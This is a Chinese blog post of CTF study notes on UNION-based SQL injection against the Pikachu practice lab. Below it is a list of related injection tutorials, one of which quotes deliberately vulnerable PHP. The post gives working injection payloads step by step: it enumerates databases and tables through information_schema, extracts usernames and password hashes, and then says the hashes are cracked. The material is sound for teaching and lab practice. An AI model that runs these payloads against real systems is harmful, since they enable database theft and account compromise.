ctf从入门到放弃学习笔记SQL注入基于union的信息获取 190509

最新推荐文章于 2025-05-26 10:55:40 发布
最新推荐文章于 2025-05-26 10:55:40 发布
阅读量808 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 学习日记 ctf 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43504939/article/details/90049125
本文介绍了SQL注入中利用UNION查询获取信息的方法,包括理解UNION的用法、通过UNION查询数据库私隐,以及在实际案例中如何爆破表名、列名,并最终解密MD5加密的密码和用户信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

union 联合查询:
可以通过联合查询来查询指定的数据
用法举例:

 select username,password from user where id=1 unionselect 字段1,字段2 from 表名

联合查询的字段数需要和主查询一致!‘

如何确定字段数??-》order by了解一下吧

在这里插入图片描述
在这里插入图片描述

然后,
用union查询又有什么用呢?
用union的目的是为了获得更多的信息,
说实话,获得那些什么名字的破信息根本没什么鸟用。
要拿到更多的数据库私隐,了解多一点。

那么就会引进一个重要的:库:

information_schema

这个库是可以形象地比喻成国家机密机构,

里面有很多重要的表。
比如:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。
详细表述了某个表属于哪个schema,表类型, 表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

那么可以利用这个库进行查询:
爆破出想要的东西:

案例:
在这里插入图片描述
先找出个构成union的前提先,
再询问一下该表名字,类型之类的:

kobe ' union select database(),user()#

然后知道了表名:
pikachu

用schema去查:

构造:

kobe' union select table_schema,table_name from information_schema.tables
(注意.tables是跨库查询,是支持的)
where table_name='pikachu'#

得出:
在这里插入图片描述
合理猜测,
要的密码和用户信息在这里。

接着

columns登场了

里面有表的列的信息,
应该用视图,存放的吧。

查询语句如下/:

kobe' union select column_name,table_name from information_schema.columns
where table_name='users'#

ojbk:
在这里插入图片描述
快解决了,
知道列和表,一查就出来了:

kobe' union select username,password from users#

在这里插入图片描述
一看就知道是md5加密
解个密就好。

ctf刷题笔记之sql注入-union注入|bugku CTF:成绩查询
weixin_51614848的博客
08-18 1436
ctf刷题笔记
CTF-Web学习笔记SQL注入
最新发布
Deng7326的博客
07-28 1075
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
CTF入门SQL注入
PolarPeak的博客
12-08 2413
一、字符型注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
SQL:合并查询(UNION
2402_88047672的博客
05-26 1273
UNIONSQL 中的一个关键字,用于 合并多个 SELECT 查询结果,并去除重复的记录,形成一个新的结果表。重点规则: 每个 SELECT 查询的列数量必须一致。 每个对应列的数据类型要兼容(如都是字符串、都是数字)。 UNION 会自动去除重复行,如果你想保留重复,可以使用 UNION ALL。
N9-SQL注入union注入
尐猴子君ii的博客
04-01 914
今天猴子君要向大家介绍的是SQL注入union章节。 首先打开pikachu渗透测试平台。 找到sql字符型注入的章节。 union语句为数据库联合语句,用法如下: SELECT 字段1,字段2 from 表名 where 条件 union SELECT 字段1,字段2 from 表名 where 条件 而union联合字段后面的查询字段的个数要与前面的字段个数相同,所以我们可以使用 ...
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3306
sql注入
SQL---Union联合注入
Z11762的博客
04-01 1197
union函数是。
SQL注入之联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 624
SQL注入之联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 679
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
CTF SQL注入学习笔记
2401_86190146的博客
02-06 1174
部分内容来自于SQL注入由简入精_哔哩哔哩_bilibili1.mysqli_error():返回最近调用函数的最后一个错误描述语法:mysqli_error(connection) 规定要使用的Mysql连接; 返回一个带有错误描述的字符串。如果没有错误发生则返回 ""2.mysqli_errno() :函数返回最近调用函数的最后一个错误代码。语法:mysqli_errno(connection);返回错误代码值。如果没有错误发生则返回 0。3.mysqli_fetch_array():从结果集中取得一行
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1025
CTFHUB SQL
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
sql注入-union注入union函数 联合注入
07-11 7760
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
[ctf零基础入门]sql注入
小飒的博客
08-30 1045
本文非常简单,适合完全0基础入门学习 需要知道mysql增删改查的最基础用法(前面博文的mysql部分) [ctf零基础入门]web基础 可以使用里面的网页进行测试,也可以安装使用sqli-labs 常用函数 查看用户名: 查询信息(以下依次为查看版本,当前使用数据库,数据库路径,数据库安装路径) 查询操作系统 上节提到的user表里的内容太多了,截图太麻烦,新建一个info表测试。 连接字符concat limit用法: 联合查询注入 select group_concat(table_nam
SQL注入union 联合注入
weixin_53711701的博客
01-16 6045
SQL注入union联合注入
SQL注入union注入学习笔记整理
spongbob1的博客
11-22 2553
union注入即为用union联合查询来查询指定的数据,需要根据每一步的返回结果来判断和进行下一步操作。此仅为个人的学习笔记。 结构 联合查询的语句结构基本为: select a from b union select c from d where e; union会一次显示两个查询结果,使第一个查询语句作为正常内容,第二个作为查询语句来进行构造。 第一步:判断类型 数字型判断 共分3步判断步骤: 1.加单引号,如输入id=1’,对应的sql为:select * from table where id=1
CTF-sql注入
K_DREAM_G的博客
05-25 1130
太菜了,sql注入命令都忘了,简单的记录一下吧!题目来源:BUUCTF
CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,#】
热门推荐
Sp4rkW的博客
08-19 1万+
原题内容: http://103.238.227.13:10083/ 这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习 首先,打开页面可见 题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点 按照常规思路,习惯性加上一个index.php,...
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 1387
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值